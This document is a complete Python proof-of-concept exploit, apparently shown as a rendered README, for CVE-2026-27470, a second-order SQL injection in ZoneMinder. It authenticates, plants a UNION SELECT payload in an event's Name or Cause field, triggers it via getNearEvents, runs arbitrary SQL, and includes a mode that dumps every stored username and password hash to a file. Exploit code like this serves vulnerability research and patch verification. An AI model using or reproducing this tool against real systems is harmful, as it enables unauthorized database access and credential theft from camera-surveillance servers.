README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-27470 - ZoneMinder Second-Order SQL Injection PoC
=============================================================
Affected versions : <= 1.36.37 and 1.37.61 - 1.38.0
Fixed in : 1.36.38 / 1.38.1
Vulnerable file : web/ajax/status.php -> getNearEvents()
Author : d3vn0mi
LEGAL DISCLAIMER:
This tool is for educational and authorized security research purposes only.
Do not use against systems you do not own or have explicit written permission
to test.
Usage:
python3 poc.py -t http://10.10.10.10 -u admin -p password
python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT user()"
python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users -o creds.txt
"""
import argparse
import logging
import os
import re
import sys
from datetime import datetime
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# ---------------------------------------------------------------------------
# ANSI colors (no external deps)
# ---------------------------------------------------------------------------
class _C:
GREEN = "\033[92m"
RED = "\033[91m"
YELLOW = "\033[93m"
CYAN = "\033[96m"
BOLD = "\033[1m"
RESET = "\033[0m"
# Disable colors when output is not a terminal
if not sys.stdout.isatty():
for attr in ("GREEN", "RED", "YELLOW", "CYAN", "BOLD", "RESET"):
setattr(_C, attr, "")
def _ok(msg):
print(f"{_C.GREEN}[+]{_C.RESET} {msg}")
def _fail(msg):
print(f"{_C.RED}[-]{_C.RESET} {msg}")
def _info(msg):
print(f"{_C.YELLOW}[*]{_C.RESET} {msg}")
BANNER = f"""{_C.CYAN}{_C.BOLD}
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-27470 — ZoneMinder Second-Order SQLi PoC ║
║ CVSS 8.8 │ Authenticated │ Events Permission ║
║ ║
║ Author: d3vn0mi ║
╚══════════════════════════════════════════════════════════════╝{_C.RESET}
"""
log = logging.getLogger("cve-2026-27470")
# ---------------------------------------------------------------------------
# Exit codes
# ---------------------------------------------------------------------------
EXIT_OK = 0
EXIT_AUTH_FAIL = 1
EXIT_NO_EVENTS = 2
EXIT_INJECT_FAIL = 3
EXIT_CONN_ERROR = 4
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _extract_csrf(text):
"""Extract __csrf_magic token from page HTML."""
m = re.search(r'csrfMagicToken\s*=\s*["\']([^"\']+)["\']', text)
if m:
return m.group(1)
m2 = re.search(r'name=["\']__csrf_magic["\'][^>]*value=["\']([^"\']+)["\']', text)
if m2:
return m2.group(1)
return None
def _build_session(proxy=None, timeout=30):
"""Create a requests.Session with common defaults."""
session = requests.Session()
session.headers.update({
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"
})
session.verify = False
session._zm_csrf = None
session._timeout = timeout
if proxy:
session.proxies = {"http": proxy, "https": proxy}
return session
def _get(session, url, **kwargs):
"""Wrapper around session.get with timeout and error handling."""
kwargs.setdefault("timeout", session._timeout)
return session.get(url, **kwargs)
def _post(session, url, **kwargs):
"""Wrapper around session.post with timeout and error handling."""
kwargs.setdefault("timeout", session._timeout)
return session.post(url, **kwargs)
# ---------------------------------------------------------------------------
# Core functions
# ---------------------------------------------------------------------------
def login(session, target, username, password):
"""
Authenticate to ZoneMinder and retrieve session cookie + CSRF token.
If ZM_OPT_USE_AUTH=0, authentication is skipped and only the session
is initialized.
"""
resp = _get(session, f"{target}/", allow_redirects=True)
session._zm_csrf = _extract_csrf(resp.text)
# Auth disabled — ZoneMinder redirects to the privacy page
if "privacy" in resp.url:
_info("ZM_OPT_USE_AUTH=0 detected — auth disabled, session ready.")
return True
# Auth enabled — send login POST
data = {
"view": "login",
"action": "login",
"username": username,
"password": password,
}
if session._zm_csrf:
data["__csrf_magic"] = session._zm_csrf
resp2 = _post(session, f"{target}/index.php", data=data, allow_redirects=True)
# Refresh CSRF token after login
new_csrf = _extract_csrf(resp2.text)
if new_csrf:
session._zm_csrf = new_csrf
if "logout" in resp2.text.lower() or "console" in resp2.url:
return True
if resp2.status_code in (200, 302):
resp3 = _get(session, f"{target}/index.php?view=console", allow_redirects=True)
if resp3.status_code == 200 and "login" not in resp3.url:
return True
return False
def get_event_id(session, target):
"""Retrieve any available event ID via the ZoneMinder status API."""
params = {
"request": "status",
"entity": "events",
"sort_field": "Id",
"sort_asc": "1",
"limit": "1",
}
resp = _get(session, f"{target}/index.php", params=params)
try:
data = resp.json()
events = data.get("results", [])
if events:
return events[0].get("Id") or events[0].get("id")
except Exception:
log.debug("Failed to parse event list response: %s", resp.text[:200])
return None
def inject_payload(session, target, event_id, payload, field="Name"):
"""
Phase 1 — Write the malicious payload into the event Name or Cause field.
ZoneMinder uses a parameterized query here so the payload is stored safely.
"""
csrf = session._zm_csrf
if field == "Name":
data = {
"request": "event",
"action": "rename",
"id": event_id,
"eventName": payload,
}
else: # Cause
data = {
"request": "event",
"action": "edit",
"id": event_id,
"newEvent[Cause]": payload,
"newEvent[Notes]": "poc",
}
if csrf:
data["__csrf_magic"] = csrf
resp = _post(session, f"{target}/index.php", data=data)
log.debug("inject_payload response: %d %s", resp.status_code, resp.text[:200])
return resp.status_code == 200
def trigger_sqli(session, target, event_id, field="Name"):
"""
Phase 2 — Trigger second-order injection via getNearEvents().
The stored payload is read from the DB and concatenated unsafely into SQL.
"""
params = {
"request": "status",
"entity": "nearevents",
"id": event_id,
"sort_field": field,
"sort_asc": "1",
}
return _get(session, f"{target}/index.php", params=params)
def restore_event_name(session, target, event_id, original_name="Event"):
"""Restore the event name to its original value after exploitation."""
csrf = session._zm_csrf
data = {
"request": "event",
"action": "rename",
"id": event_id,
"eventName": original_name,
}
if csrf:
data["__csrf_magic"] = csrf
_post(session, f"{target}/index.php", data=data)
def _parse_result(resp):
"""Extract the leaked value from the getNearEvents response."""
try:
data = resp.json()
nearevents = data.get("nearevents", {})
if nearevents:
for key in ("NextEventId", "PrevEventId", "NextEventStartTime"):
val = nearevents.get(key)
if val:
return str(val)
results = data.get("results", data.get("data", []))
if results:
val = results[0].get("Id") or results[0].get("StartDateTime")
if val:
return str(val)
return str(data)
except Exception:
return resp.text[:500]
def run_exploit(target, username, password, sql_query, field="Name",
restore=True, manual_event_id=None, proxy=None, timeout=30):
"""Execute one injection cycle and return the extracted value."""
session = _build_session(proxy=proxy, timeout=timeout)
_info(f"Target : {target}")
_info(f"User : {username}")
_info(f"Query : {sql_query}")
print()
# Step 1 — Authenticate
_info("Logging in...")
try:
if not login(session, target, username, password):
_fail("Login failed. Check credentials.")
sys.exit(EXIT_AUTH_FAIL)
except requests.ConnectionError as exc:
_fail(f"Connection error: {exc}")
sys.exit(EXIT_CONN_ERROR)
_ok("Session established.")
# Step 2 — Get event ID
if manual_event_id:
event_id = manual_event_id
_ok(f"Event ID (manual): {event_id}")
else:
_info("Looking for an event ID...")
event_id = get_event_id(session, target)
if not event_id:
_fail("No events found. Specify one manually with --event-id.")
sys.exit(EXIT_NO_EVENTS)
_ok(f"Event ID: {event_id}")
# Step 3 — Build UNION-based payload
# Events.Name is varchar(64) — keep payloads under 63 chars
# UNION SELECT requires 2 columns (Id, StartDateTime)
union_payload = f"' UNION SELECT ({sql_query}),NULL-- -"
_info(f"Injecting payload into '{field}' field...")
if not inject_payload(session, target, event_id, union_payload, field=field):
_fail("Failed to write payload. Check permissions.")
sys.exit(EXIT_INJECT_FAIL)
_ok("Payload stored via parameterized query — looks clean in the DB.")
# Step 4 — Trigger second-order injection
_info("Triggering second-order injection...")
resp = trigger_sqli(session, target, event_id, field=field)
log.debug("trigger response: HTTP %d", resp.status_code)
_info(f"HTTP {resp.status_code}")
result = _parse_result(resp)
# Step 5 — Cleanup
if restore:
restore_event_name(session, target, event_id)
_info("Event name restored.")
return result
def _write_output(filepath, content):
"""Append content to the output file."""
with open(filepath, "a") as fh:
fh.write(content)
_ok(f"Results saved to {os.path.abspath(filepath)}")
# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------
def main():
print(BANNER)
parser = argparse.ArgumentParser(
description="CVE-2026-27470 — ZoneMinder Second-Order SQL Injection PoC"
)
parser.add_argument("-t", "--target", required=True,
help="Target URL (e.g. http://10.10.10.10)")
parser.add_argument("-u", "--username", required=True,
help="ZoneMinder username")
parser.add_argument("-p", "--password", required=True,
help="ZoneMinder password")
parser.add_argument("--event-id", type=int,
help="Event ID to use as injection carrier")
parser.add_argument("--field", default="Name",
choices=["Name", "Cause"],
help="Injection field (default: Name)")
parser.add_argument("--query", default="SELECT VERSION()",
help="SQL query to execute (default: SELECT VERSION())")
parser.add_argument("--dump-users", action="store_true",
help="Dump all usernames and password hashes")
parser.add_argument("-o", "--output", default=None,
help="Save results to file (default: dumped_creds.txt for --dump-users)")
parser.add_argument("--no-restore", action="store_true",
help="Do not restore the event name after exploitation")
parser.add_argument("--proxy", default=None,
help="HTTP proxy (e.g. http://127.0.0.1:8080)")
parser.add_argument("--timeout", type=int, default=30,
help="Request timeout in seconds (default: 30)")
parser.add_argument("-v", "--verbose", action="store_true",
help="Enable debug logging")
args = parser.parse_args()
target = args.target.rstrip("/")
eid = args.event_id
restore = not args.no_restore
if args.verbose:
logging.basicConfig(level=logging.DEBUG,
format="%(asctime)s %(name)s %(levelname)s: %(message)s")
else:
logging.basicConfig(level=logging.WARNING)
common = dict(
field=args.field,
restore=restore,
manual_event_id=eid,
proxy=args.proxy,
timeout=args.timeout,
)
if args.dump_users:
output_path = args.output or "dumped_creds.txt"
_info("Mode: User dump")
count_result = run_exploit(
target, args.username, args.password,
"SELECT COUNT(*) FROM Users", **common,
)
print(f"\n{_C.BOLD}[+] User count: {count_result}{_C.RESET}\n")
# Write header
header = (
f"# CVE-2026-27470 — ZoneMinder credential dump\n"
f"# Target : {target}\n"
f"# Date : {datetime.utcnow().isoformat()}Z\n"
f"# Format : username:hash\n\n"
)
with open(output_path, "w") as fh:
fh.write(header)
creds_found = 0
for i in range(10):
uname = run_exploit(
target, args.username, args.password,
f"SELECT Username FROM Users LIMIT {i},1", **common,
)
uname_str = str(uname) if uname else ""
if not uname_str or uname_str in ("None", "1", "") or "{" in uname_str:
break
passwd = run_exploit(
target, args.username, args.password,
f"SELECT Password FROM Users LIMIT {i},1", **common,
)
line = f"{uname}:{passwd}"
_ok(f"User {i + 1}: {line}")
with open(output_path, "a") as fh:
fh.write(line + "\n")
creds_found += 1
if creds_found:
print()
_ok(f"{creds_found} credential(s) saved to {os.path.abspath(output_path)}")
else:
_fail("No credentials extracted.")
else:
result = run_exploit(
target, args.username, args.password, args.query, **common,
)
print(f"\n{_C.BOLD}[+] Result: {result}{_C.RESET}\n")
if args.output:
_write_output(args.output, result + "\n")
sys.exit(EXIT_OK)
if __name__ == "__main__":
main()